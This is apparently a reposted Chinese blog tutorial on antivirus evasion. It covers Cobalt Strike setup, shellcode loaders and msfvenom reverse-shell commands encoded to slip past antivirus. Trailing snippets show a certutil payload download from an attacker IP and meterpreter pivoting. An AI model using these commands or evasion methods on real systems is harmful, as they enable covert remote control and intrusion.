杀毒与免杀技术详解--白嫖党福音

VSole2021-12-04 07:10:15

0x01 简介

不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到杀软waf这些大敌,当然主要还是杀软,因此我们不得不考虑免杀进而实现我们渗透测试目的。

0x02 概念

2.1 免杀类别

简单总结下我知道的免杀类别:

一句话木马绕狗(我觉得他不应该出现在这里,但为了致敬我学习的第一个免杀,把他放了出来)

文件不落地
shellcode加密
修改源码增加花指令
DLL加载
自定义加载器
指定特定的运行方式
加壳

当然还可以按照大的类别划分

静态扫描免杀
内存扫描免杀
流量分析免杀
行为分析免杀
逆向分析免杀
机器学习免杀

由于弟弟水平有限,知道的东西很少(流量分析,逆向分析一点不懂,机器学习更是一脸懵逼),望哥哥们见谅,当然最好能留下些建议或者私下能和弟弟交流下。

2.2 免杀工具

推荐一些公开流传的k8工具:

文字:

sc加载器(具体下面有介绍)
K8免杀系统自带捆绑器加强版V2.0
K8数字签名添加器
K8随机免杀花指令生成器V2.0(只是生成花指令)

图片:

大概的总结下k8工具过免杀思路吧:

1.sc加载器实现绕过,原理在于加密
2.利用其他安全软件的数字签名,进行绕过
3.捆绑正常的软件,进行绕过
4.增加没有实用效果的花指令进行绕过(花指令需要自己加然后编译)

既然是免杀,当然不能忘记cs:

cs(Cobalt Strike)的话我只有三个版本,v3的两个版本,还有v4.0的,cs是一个强大的免杀工具,并且支持c2在线团队使用。对于很多大佬来说肯定是十分熟悉的,弟弟我只能简单的介绍下其简介:

cs拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,cs还可以调用Mimikatz等其他知名工具。

0x03 实践

说的再多也不如拿真实情况来说话,实践主要对上述的六种工具做下简单的使用,并利用线上沙箱进行简单的查杀检测。

3.1:Cobalt Strike-3.12

因为是浅谈,再有就是我实在是太懒了,能缩水就缩水,求饶过别打我。

3.1.1:安装sever

我用的啊某云的云当的sever,这里需要注意的是只能用linux的,并且安装好java,3.12的有不同的包,而4.0的只有一个包。接下来主要以3.12为主。

3.1.2:启动sever

启动的格式:

./teamserver <host> <password>

3.1.3:启动client

端口50050是默认的。然后用户名随意,密码和host是之前添加的。

3.1.4:建立一个监听

根据自己的需要建立一个监听

3.1.5:生成一个exe

当然还可以生成别的,这里只做测试,简略操作,不然光cs就能写一个系列。

当然还有其他格式的木马

   HTML Application 生成恶意的HTA木马文件;

   MS Office Macro 生成office宏病毒文件;

   Payload Generator 生成各种语言版本的payload;

   USB/CD AutoPlay 生成利用自动播放运行的木马文件;

   Windows Dropper 捆绑器,能够对文档类进行捆绑;

   Windows Executable 生成可执行exe木马;

   Windows Executable(S) 生成无状态的可执行exe木马

3.1.6:目标上线

之后就可以实远控了,轻则控制桌面,重则横向,获取域控,但要时刻谨记网络安全法,做有授权合法的渗透。

放张图,自己看:

3.1.7:在线沙盒查杀

直接放个查杀结果连接:

https://r.virscan.org/language/zh-cn/report/855d5e6b12061dd0da0d048458ef7441

3.1.8:总结

为了更加真实我用的本机打开的木马,火狐全程无提醒,但是通过流量分析和走向能发现。

这里是能获取到远程ip的,但是如果我们换个骚思路,加个cdn,他还咋发现emmm。当然cs的功能还有很多,这里只做简单介绍。

3.2 k8工具

k8工具,流传的比较广,因此有些免杀效果一般,而sc加载器利用原理不外乎是加密。

3.2.1:罗列下工具

   [+] 免杀工具 scrunBase64 ShellCode免杀加载器(CS & MSF)

   [+] 免杀工具 scrunBase32 ShellCode免杀加载器(CS & MSF)

   [+] 免杀工具 scrun.exe & scrun.py ShellCode免杀加载器(CS & MSF)

   [+] 免杀工具 K8SCENCODE(CS & Msf免杀工具).rar

   [+] 免杀工具 K8随机免杀花指令生成器V2.0.exe

   [+] 免杀工具 K8数字签名添加器.exe

   [+] 捆绑工具 K8免杀系统自带捆绑器加强版V2.0.EXE

接下来主要说下sc加载器,因为其他的捆绑或者数字签名软件完全是傻瓜操作,花指令更是知识和生成花指令,编译还得自己整,当时做的截图找不到了,我也不想再做一遍了。。。

3.2.2:利用msf生成个shellcode先(用cs也可以)

msf生成shellcode命令:

msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c

3.2.3:将shellcode转化为hex格式,再利用sc加载器加载:

3.2.4:msf发现上线

3.2.5:在线沙盒查杀

用的txt,因为是无文件落地:

https://r.virscan.org/language/zh-cn/report/69f9ffe3e1a9780d0e1d2942efa203d2

3.2.6:总结

简单的说下优缺点吧:

优点:无文件落地,避免了防火墙,无样本可以分析。

缺点:需要sc加载器,不然没效果,不落地方案操作会被提醒。

3.3 msf生成木马

这个应该很简单吧,做下简单介绍吧,如果想利用更的操作,可以show paload,根据自己需求。

3.3.1 生成exe木马

生成命令:

msf -p windows/shell_reverse_tcp LHOST=192.168.111.139 LPORT=1235 -e x86/shikata_ga_nai -i 12 -b '\x00' -f exe > shell.exe

附图:

为了照顾新加入的哥哥,贴下msf opthions:

-p, —payload  指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l, —list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all-n, —nopsled  为payload预先指定一个NOP滑动长度-f, —format  指定输出格式 (使用 —help-formats 来获取msf支持的输出格式列表)-e, —encoder [encoder] 指定需要使用的encoder(编码器)-a, —arch  指定payload的目标架构—platform  指定payload的目标平台-s, —space  设定有效攻击荷载的最大长度-b, —bad-chars  设定规避字符集,比如: '\x00\xff'-i, —iterations  指定payload的编码次数-c, —add-code  指定一个附加的win32 shellcode文件-x, —template  指定一个自定义的可执行文件作为模板-k, —keep 保护模板程序的动作,注入的payload作为一个新的进程运行—payload-options 列举payload的标准选项-o, —out  保存payload-v, —var-name  指定一个自定义的变量,以确定输出格式—shellest 最小化生成payload-h, —help 查看帮助选项—help-formats 查看msf支持的输出格式列表

3.3.2:在线查杀

附上在线查结果连接:

https://r.virscan.org/language/zh-cn/report/adbcb14c4708ea7bf7f6f6c6668d1b70

如果想要绕过更多杀软,例如360,可以进行加盐处理,就是生成c语言shellcode,之后添加无用的东西。

3.3.3:总结

Metasploit是最为常用的渗透框架,他包含了世界上最大而且经过测试攻击的代码数据库。所以,熟练掌握Metasploit也是一个渗透人员的基本功吧,所以这个地方没写 太多。

免杀原理:利用msf加载器,对我们攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出

优点:操作简单,代码数据库多。

局限:不适合团队合作使用,在真实对抗中,需要实现长期维持的目的,因此更会有倾向的选择相应工具,包括c2框架(弟弟单纯的想法,如有错误,请哥哥们指正)

3.4 其他c2框架生成shellcode

除了cs,msf以外我个人还比较喜欢用帝国(empire),当然还是根据个人喜好来,我会附上几款read-team框架供哥哥们参考,在此不做赘述。

0x04 碎碎念

我在这里挖了个坑,有些东西没有详细介绍,例如cs,还有一些免杀方法也没有实践举例(例如DLL加载,自定义加载器,指定特定的运行方式,加壳,还有我不会的流量分析)。

其实是有笔记在的,但是!但是!我想多要几个赞,我之前发表的文章有些一个赞都没有的说,明明是有人看的(例如AI王者荣耀),点赞量满意了,妹妹就放出来更多干货:

免杀系列相关的内容:其他好用的c2框架以及简单使用,cs的更多利用方式

其他会的一些东西和笔记:一些社工奇淫技巧,一些很骚的wenshell木马原理,低中高交互的蜜罐以及搭建,beef的高级应用,朔源取证工具使用,内网渗透思路,提权,哪怕信息收集都是有一些东西在的

好了以上都是妹妹的碎碎念,其实我都不会的,我就是吹吹牛,记得点赞哦。

原文链接:https://python1.blog.csdn.net/article/details/112661486?spm=1001.2101.3001.6650.15&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-15.highlightwordscore&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-15.highlightwordscore
免杀msf
本作品采用《CC 协议》,转载必须注明作者和本文链接
主要记录拿到Shell后再反弹MSF Shell、Mimikatz抓取密码以及登录域控等内网部分。前面漏洞环境搭建及打点等不作记录,可查看参考文章。攻击机利用Python开启HTTP服务$ python -m SimpleHTTPServer 8080. 靶机CMD下载木马文件$ certutil.exe -urlcache -split -f http://<攻击者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻击者IP>:<攻击机监听端口>. 并且需要迁移到权限为NT AUTHORITY\SYSTEM的进程,因为进程迁移后meterpreter的权限是迁移进程的权限。查看靶机位数&进程meterpreter > sysinfo # 查看位数。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010扫一下MS17-010meterpreter > background # 后台挂起Session
1、文档连接钓鱼 1)LINK链接钓鱼 2)LINK快捷方式钓鱼 3)CHM文档钓鱼 CHM文档bypass waf 4)HTA钓鱼 5)宏钓鱼 宏钓鱼 bypass waf 6)OLE(Object Linking and Embedding,对象链接与嵌入) 7)嵌入JS元素 8)利用模板文件注入宏指令 9)CVE 2、伪造界面钓鱼 1)PPT动
连上Webshell后发现执行不了任何命令,连常规的set、ver、whoami等命令都不行,EXE就更不用说了。执行时会卡一段时间,没有回显,也不显示:拒绝访问,说明不是360和火绒拦的。
技术全称为反杀毒技术 Anti-Virus 简称“”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于技术的涉猎非常广,其中包含反汇编、逆向工程、系统漏洞等技术,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。
生成PayloadMetasploit,输出c、py格式,可用xor、xor_dynamic、zutto_dekiru编码器。CobaltStrike,这里选择使用x64的C语言或Python语言的Shellcode。
Bypass_AV msf,ShellCode加载器 ,shellcode执行程序 ,360&火绒&Windows Defender代码够简单,估计要不了多久就进特征库了,被了再去改几个特征码照样又可以,作者的github保持更新,可以去瞅瞅。测试可以国内软?注意:ShellCode 需要是64位的加载器将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处注意:保留原始ShellCode 里的双引号 "示例:最终格式:打包成可执行程序编译Python 3.8.6pyinstaller 4.7pip install pyinstaller
Bypass_AV msf,ShellCode加载器 ,shellcode执行程序 ,360&火绒&Windows Defender。代码够简单,估计要不了多久就进特征库了,被了再去改几个特征码照样又可以,保持更新。
知识汇总
2021-08-25 23:11:00
知识汇总
VSole
网络安全专家